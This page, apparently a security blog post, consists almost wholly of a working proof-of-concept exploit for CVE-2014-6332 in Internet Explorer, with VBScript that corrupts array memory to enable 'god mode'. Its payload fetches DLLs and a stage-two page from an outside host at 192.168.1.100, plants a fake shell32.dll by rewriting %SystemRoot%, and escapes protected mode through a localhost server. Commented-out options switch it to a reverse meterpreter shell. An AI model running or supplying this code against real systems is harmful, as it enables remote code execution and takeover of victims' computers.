CVE-2014-6332 PoC 绕过保护模式获取shell

<!-- CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode - Tested on IE11 + Windows 7 64-bit References: - original PoC - http://www.exploit-db.com/exploits/35229/ - http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ - http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html - https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf - http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb --> &nbsp;  <script>// <![CDATA[ var oReq; function getdll(downloadFile) {     oReq = new XMLHttpRequest();     oReq.open("GET", "http://192.168.1.100/"+downloadFile, true);     oReq.onreadystatechange = handler;     oReq.send(); }  function handler() {     if (oReq.readyState == 4 && oReq.status == 200) {         OnDownloadDone();     } }  function tolocal() {     location.href = "http://localhost:5555/stage2.html" } // ]]></script>  <script>// <![CDATA[ ' local server files to get medium integrity downloadFiles = Array("ieshell32.dll", "ielocalserver.dll", "stage2.html") cacheRegex = Array("^ieshell32[d].dll$", "^ielocalserver[d].dll$", "^stage2[d].htm$") ' reverse meterpreter shell files 'downloadFiles = Array("ieshell32.dll", "metp.dll") 'cacheRegex = Array("^ieshell32[d].dll$", "^metp[d].dll$") Dim cacheFiles(3)  Dim downloadState Dim pinTime  Dim oFSO Dim oWS Dim shell  function FindFile(path, regexFile)     FindFile = ""     For Each f in oFSO.GetFolder(path).Files         If regexFile.Test(f.Name) Then             FindFile = f.Name             Exit For         End If     Next     end function  function SearchCache(path, regexFile)     SearchCache = ""     For Each fld in oFSO.GetFolder(path).SubFolders         'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then             filename = FindFile(path & "" & fld.Name, regexFile)             If filename <> "" Then                 SearchCache = path & "" & fld.Name & "" & filename                 Exit For             End If         'End If     Next end function  function loaddll()     On Error Resume Next      Set wshSystemEnv = oWS.Environment("Process")     tmpDir = oFSO.GetSpecialFolder(2)          tmpSysDir = tmpDir & "System32"     tmpShellFile = tmpSysDir & "shell32.dll"     oFSO.CreateFolder(tmpSysDir)     oFSO.CopyFile cacheFiles(0), tmpShellFile          mydllFile = tmpDir & "" & downloadFiles(1)     oFSO.CopyFile cacheFiles(1), mydllFile     wshSystemEnv("MyDllPath") = mydllFile          If (UBound(downloadFiles) = 2) Then         stage2File = tmpDir & "stage2.html"         oFSO.CopyFile cacheFiles(2), stage2File         wshSystemEnv("stage2file") = stage2File     End If          saveRoot = wshSystemEnv("SystemRoot")     wshSystemEnv("SaveSystemRoot") = saveRoot     wshSystemEnv("SystemRoot") = tmpDir     Set shell = CreateObject("Shell.Application")     ' have to restore %SystemRoot% in dll, not here          oFSO.DeleteFile tmpShellFile     oFSO.DeleteFolder tmpSysDir          If (UBound(downloadFiles) = 2) Then         call tolocal()     End If end function  Sub OnDownloadDone()     cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")     cacheDir = cacheDir & "MicrosoftWindowsTemporary Internet FilesLowContent.IE5"          Set regexFile = new regexp     regexFile.Pattern = cacheRegex(downloadState)     cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)     If cacheFiles(downloadState) = "" Then         Exit Sub     End If          If downloadState = UBound(downloadFiles) Then         loaddll()     Else         downloadState = downloadState + 1         DoDownload()     End If End Sub  Sub DoDownload()     pinTime = Now     call getdll(downloadFiles(downloadState)) End Sub  Sub runshell()     Set oFSO = CreateObject("Scripting.FileSystemObject")     Set oWS = CreateObject("WScript.Shell")     downloadState = 0     DoDownload() End Sub   // ]]></script>  <script>// <![CDATA[ dim arrX() dim arrY()  dim asize dim incsize dim olapPos  Begin()  function Begin()     On Error Resume Next     Init()     If Exploit() = True Then         EnableGodMode()         redim Preserve arrX(asize)         runshell()     End If end function  function Init()     Randomize()     asize = 13 + 17*rnd(6)     incsize = 7 + 3*rnd(5) end function  function Exploit()     dim i     Exploit = False     For i = 0 To 400         asize = asize + incsize         If Trigger() = True Then             Exploit = True             Exit For         End If     Next end function  function Trigger()     On Error Resume Next     dim typev     dim ofnumele          Trigger = False     olapPos = asize + 2     ofnumele = asize + &h8000000          redim Preserve arrX(asize)     redim arrY(asize)     redim Preserve arrX(ofnumele)          typev = 1     arrY(0) = 1.123456789012345678901234567890          If (IsObject(arrX(olapPos-1)) = False) Then         If (VarType(arrX(olapPos-1)) <> 0) Then             If (IsObject(arrX(olapPos)) = False) Then                 typev = VarType(arrX(olapPos))             End If         End If     End If          If (typev = &h2f66) Then         Trigger = True     Else         redim Preserve arrX(asize)     End If end function  function ReadMemInt(addr)     arrY(0) = 0     arrX(olapPos) = addr+4     arrY(0) = 8     ReadMemInt = lenb(arrX(olapPos)) end function  function EnableGodMode()     i = LeakFnAddr()     i = ReadMemInt(i+8)     i = ReadMemInt(i+16)          myarray = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uFFFF%u7FFF%u0000%u0000")     arrX(olapPos+2) = myarray     arrY(2) = 8192 + 12          EnableGodMode = False     For k=0 To &h60 step 4         j = ReadMemInt(i+&h120+k)         If (j = 14) Then             arrX(olapPos+2)(i+&h11c+k) = arrY(4)             EnableGodMode = True             Exit For         End If     Next end function  sub dummyfn() end sub  function LeakFnAddr()     On Error Resume Next     i = dummyfn     i = null     arrY(0) = 0     arrX(olapPos) = i     arrY(0) = 3     LeakFnAddr = arrX(olapPos) end function // ]]></script>